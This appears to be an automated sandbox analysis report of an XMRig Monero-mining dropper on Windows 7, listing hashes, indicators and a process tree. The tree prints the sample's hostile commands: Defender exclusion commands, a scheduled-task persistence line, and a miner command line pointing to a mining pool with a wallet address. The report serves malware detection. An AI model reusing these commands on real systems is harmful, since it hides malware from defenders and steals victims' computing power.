xmrig | 9dca904c03551d33f96618bae69cb43811bd5072826ead4e1b7072229451a376

Analysis

max time kernel
52s
max time network
111s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
04/07/2023, 21:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

2.3MB
MD5

cdce958317e838eb09ec7e678ba1995c
SHA1

30d5a9b4f1083e2f188b7ce2d2c24fd63c0b413b
SHA256

9dca904c03551d33f96618bae69cb43811bd5072826ead4e1b7072229451a376
SHA512

79e021418a99c5ed38a0995887b9bd7711bbe9b299113c76a87f02eb111c9211c350b7d5b2580ca40a81bd110d53a899a11c4b9e61e3338b90ac4ab84dae81f2
SSDEEP

49152:OlJiXsQqb2AkydMeCL9+feqU9QWsNNHrT:OH7dj3O8mqkQNNHrT

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral1/memory/2836-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-124-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-126-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-128-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-130-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2836-134-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2420	ELRX.exe

Loads dropped DLL 1 IoCs

pid	Process
2128	cmd.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2500	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2224	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2340	powershell.exe
2344	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	file.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	2420	ELRX.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 2340	3064	file.exe	28
PID 3064 wrote to memory of 2340	3064	file.exe	28
PID 3064 wrote to memory of 2340	3064	file.exe	28
PID 3064 wrote to memory of 2344	3064	file.exe	29
PID 3064 wrote to memory of 2344	3064	file.exe	29
PID 3064 wrote to memory of 2344	3064	file.exe	29
PID 3064 wrote to memory of 2128	3064	file.exe	32
PID 3064 wrote to memory of 2128	3064	file.exe	32
PID 3064 wrote to memory of 2128	3064	file.exe	32
PID 2128 wrote to memory of 2224	2128	cmd.exe	34
PID 2128 wrote to memory of 2224	2128	cmd.exe	34
PID 2128 wrote to memory of 2224	2128	cmd.exe	34
PID 2128 wrote to memory of 2420	2128	cmd.exe	35
PID 2128 wrote to memory of 2420	2128	cmd.exe	35
PID 2128 wrote to memory of 2420	2128	cmd.exe	35
PID 2420 wrote to memory of 272	2420	ELRX.exe	36
PID 2420 wrote to memory of 272	2420	ELRX.exe	36
PID 2420 wrote to memory of 272	2420	ELRX.exe	36
PID 2420 wrote to memory of 2056	2420	ELRX.exe	37
PID 2420 wrote to memory of 2056	2420	ELRX.exe	37
PID 2420 wrote to memory of 2056	2420	ELRX.exe	37

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9A6.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2224
- - C:\ProgramData\CodeShorts\ELRX.exe
    "C:\ProgramData\CodeShorts\ELRX.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      PID:2056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
      4⤵
      PID:2792
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2500
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:2836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CodeShorts\ELRX.exe

Filesize
454.8MB

MD5
fc3a940f31e120d3647eea5464d74e5e

SHA1
62eed506d02e5ed69b45fa8262c5515ba76d808a

SHA256
4dbdb7dce3e2d343ec68f73db4e28e8e9cae1b4b23bf11a232aa68b952ba12b1

SHA512
72f4ccd7b43cd4af9be5c55efcccf825f72dd75dfe6085ef63a04c4c1907ddde113a2155fbe17e741a7b3460d45a4616e999c8de668c0390d2d8b6c0f956613f

Download Submit
C:\ProgramData\CodeShorts\ELRX.exe

Filesize
474.7MB

MD5
bd83c81b8aad4f15a80769a6cae57c6c

SHA1
58372e858c4283e89f5a70c8ac320b098ccb4a10

SHA256
19b61bc2efe992821b6330651ed1962348e8f3eff96ae84b73ca012f733f7e1d

SHA512
2a7678de13858319dcbc4ddf51be0fa960428615ea901d650dbabb3913d119bea18f196d1e619d24f40af4ca56446a3085edd5bc71ef15592a8f39364699889a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC9A6.tmp.bat

Filesize
143B

MD5
3e08c7e072304c9a7396e60232786cfb

SHA1
8e263d24d0aa0018b1fd4638dd8d412e1f5dbb7b

SHA256
5356f4c007b0fb69e585d50255ede6fe018e592cd12a9631fac5798e423b2903

SHA512
9ca4cfa0d21fffd787eddc324f05e8035b2ae0b0c11def07f7cc98d1fd2707a79db316b2355ce43a1bfadc1acd1043b05d2d4a3bb4f422c24306d8a36fe41994

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC9A6.tmp.bat

Filesize
143B

MD5
3e08c7e072304c9a7396e60232786cfb

SHA1
8e263d24d0aa0018b1fd4638dd8d412e1f5dbb7b

SHA256
5356f4c007b0fb69e585d50255ede6fe018e592cd12a9631fac5798e423b2903

SHA512
9ca4cfa0d21fffd787eddc324f05e8035b2ae0b0c11def07f7cc98d1fd2707a79db316b2355ce43a1bfadc1acd1043b05d2d4a3bb4f422c24306d8a36fe41994

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38f0bb9781dfaaf163451ef776d7c653

SHA1
12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece

SHA256
2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35

SHA512
b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38f0bb9781dfaaf163451ef776d7c653

SHA1
12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece

SHA256
2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35

SHA512
b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38f0bb9781dfaaf163451ef776d7c653

SHA1
12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece

SHA256
2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35

SHA512
b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VEQW1HSWJ0HCS79ZSN9X.temp

Filesize
7KB

MD5
38f0bb9781dfaaf163451ef776d7c653

SHA1
12e1a8022feb5efe1c6ef7d4a3c113c0685f6ece

SHA256
2e80dbb4093ffe7e6b6a35ffab461de4be1739feccb2752c9a7df7a95a0fae35

SHA512
b3dabe8e7f873355d4c070c7c06eda02a1da40789f30ed6bd3c5db74fc228e1a530c8b774f0ff1cf36c117ba650fbcd8842a5d4a4899734f2327f847d2c486b3

Download Submit
\ProgramData\CodeShorts\ELRX.exe

Filesize
456.7MB

MD5
68bd36b878d0844c77183077da155042

SHA1
b687ea543dc337e98cea8240f4fab67d59bb07d0

SHA256
79b92404c90f4219182b12432756799321eeb3c5602995ecfb157a21d747a971

SHA512
b5307210931c0845bda81f661ecc771915b387d0163a6d6efbdd60175657912131456b796f9c20ebcf7b50c3a6074fe98ae6b6457078f52850d42f4297ff6a0f

Download Submit
memory/272-113-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/272-111-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/272-112-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/272-115-0x000000000269B000-0x00000000026D2000-memory.dmp

Filesize
220KB

Download
memory/2056-109-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2056-110-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2056-100-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/2056-108-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2056-105-0x00000000024D0000-0x00000000024D8000-memory.dmp

Filesize
32KB

Download
memory/2056-114-0x000000000243B000-0x0000000002472000-memory.dmp

Filesize
220KB

Download
memory/2340-71-0x0000000002790000-0x0000000002810000-memory.dmp

Filesize
512KB

Download
memory/2340-73-0x000000000279B000-0x00000000027D2000-memory.dmp

Filesize
220KB

Download
memory/2340-69-0x0000000002790000-0x0000000002810000-memory.dmp

Filesize
512KB

Download
memory/2340-70-0x0000000002794000-0x0000000002797000-memory.dmp

Filesize
12KB

Download
memory/2340-66-0x0000000002450000-0x0000000002458000-memory.dmp

Filesize
32KB

Download
memory/2344-72-0x0000000002704000-0x0000000002707000-memory.dmp

Filesize
12KB

Download
memory/2344-65-0x000000001B430000-0x000000001B712000-memory.dmp

Filesize
2.9MB

Download
memory/2344-74-0x000000000270B000-0x0000000002742000-memory.dmp

Filesize
220KB

Download
memory/2420-91-0x000000001B430000-0x000000001B4B0000-memory.dmp

Filesize
512KB

Download
memory/2420-90-0x0000000000090000-0x00000000002E4000-memory.dmp

Filesize
2.3MB

Download
memory/2420-92-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/2420-116-0x000000001B430000-0x000000001B4B0000-memory.dmp

Filesize
512KB

Download
memory/2836-128-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-134-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-132-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-122-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-124-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-131-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2836-126-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-130-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2836-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3064-75-0x0000000002320000-0x00000000023A0000-memory.dmp

Filesize
512KB

Download
memory/3064-67-0x0000000002320000-0x00000000023A0000-memory.dmp

Filesize
512KB

Download
memory/3064-54-0x0000000000CC0000-0x0000000000F14000-memory.dmp

Filesize
2.3MB

Download
memory/3064-68-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download